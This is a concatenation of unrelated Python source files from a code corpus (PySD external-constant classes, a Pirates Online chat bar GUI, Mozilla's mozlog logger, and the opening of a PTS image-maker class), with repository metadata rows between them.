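lookup = xr.DataArray([10.0, 20.0], coords={"lookup_dim": [0.0, 1.0]},
                      dims=["lookup_dim"])
print(float(lookup.interp(lookup_dim=0.25)))  # inside the range         -> 12.5
print(float(lookup[-1]))                      # x above the range clamps -> 20.0
print(float(lookup[0]))                       # x below the range clamps -> 10.0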
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function that reads data from the Excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell", the top-left cell (already split into row
and column numbers) where the data starts.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data starting from the top-left cell using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " does not have the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
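# Editor's illustration (standalone sketch, not part of the class above):
# after pandas reads the requested block of cells, ExtSubscript only flattens
# the values and prefixes each entry. The same transformation on an
# in-memory frame (the region names below are made up for the example):
import pandas as pd

block = pd.DataFrame([["North", "South"], ["East", "West"]])
print(["region " + str(d) for d in block.values.flatten()])
# ['region North', 'region South', 'region East', 'region West']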
| 34.156189
| 79
| 0.515516
| 4,033
| 34,771
| 4.313662
| 0.106868
| 0.01414
| 0.017819
| 0.01644
| 0.447836
| 0.396103
| 0.334713
| 0.284934
| 0.261654
| 0.241363
| 0
| 0.006891
| 0.3865
| 34,771
| 1,017
| 80
| 34.189774
| 0.808644
| 0.224239
| 0
| 0.403448
| 0
| 0
| 0.091609
| 0.000913
| 0
| 0
| 0
| 0.001967
| 0.017241
| 1
| 0.056897
| false
| 0.003448
| 0.013793
| 0.005172
| 0.143103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bd44a6d884dfc054933f1d7828b758d91a71b3
| 15,921
|
py
|
Python
|
pirates/piratesgui/ChatBar.py
|
ksmit799/POTCO-PS
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 8
|
2017-01-24T04:33:29.000Z
|
2020-11-01T08:36:24.000Z
|
pirates/piratesgui/ChatBar.py
|
ksmit799/Pirates-Online-Remake
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 1
|
2017-03-02T18:05:17.000Z
|
2017-03-14T06:47:10.000Z
|
pirates/piratesgui/ChatBar.py
|
ksmit799/Pirates-Online-Remake
|
520d38935ae8df4b452c733a82c94dddac01e275
|
[
"Apache-2.0"
] | 11
|
2017-03-02T18:46:07.000Z
|
2020-11-01T08:36:26.000Z
|
# File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **kw)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **kw)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **kw)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = 'John Sharkbait', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| 43.5
| 464
| 0.655172
| 1,593
| 15,921
| 6.490898
| 0.181419
| 0.032495
| 0.0147
| 0.018569
| 0.459188
| 0.394971
| 0.361025
| 0.309188
| 0.267215
| 0.200774
| 0
| 0.086765
| 0.228315
| 15,921
| 365
| 465
| 43.619178
| 0.754843
| 0.001256
| 0
| 0.363971
| 0
| 0
| 0.051959
| 0.011826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113971
| false
| 0.025735
| 0.033088
| 0.003676
| 0.172794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bd4912fb3c20a7cbfabbd3fdd321346095f54b
| 6,610
|
py
|
Python
|
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
mozmill-env/python/Lib/site-packages/mozlog/logger.py
|
lucashmorais/x-Bench
|
2080b8753dd6e45c2212666bcdb05327752a94e9
|
[
"MIT"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The message can be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overridden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any effect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
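# Editor's usage sketch (not part of the original module): obtain a MozLogger
# through getLogger() and emit both a test-status line and a structured JSON
# entry. The logger names below are made up for the example.
if __name__ == '__main__':
    plain = getLogger('demo.plain')
    plain.testStart('test_login')
    plain.testPass('test_login')

    json_handler = StreamHandler()
    json_handler.setFormatter(JSONFormatter())
    structured = getLogger('demo.json', handler=json_handler)
    structured.log_structured('test_end', {'_message': 'test_login ok',
                                           '_level': 'TEST-END'})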
| 36.519337
| 100
| 0.637065
| 810
| 6,610
| 5.120988
| 0.31358
| 0.031823
| 0.04918
| 0.030376
| 0.081485
| 0.058341
| 0.036162
| 0
| 0
| 0
| 0
| 0.00539
| 0.270197
| 6,610
| 180
| 101
| 36.722222
| 0.854478
| 0.366415
| 0
| 0.043956
| 0
| 0
| 0.07532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120879
| false
| 0.043956
| 0.043956
| 0
| 0.263736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c1a81157e41324b28041d302b03e92ee199d40
| 14,335
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
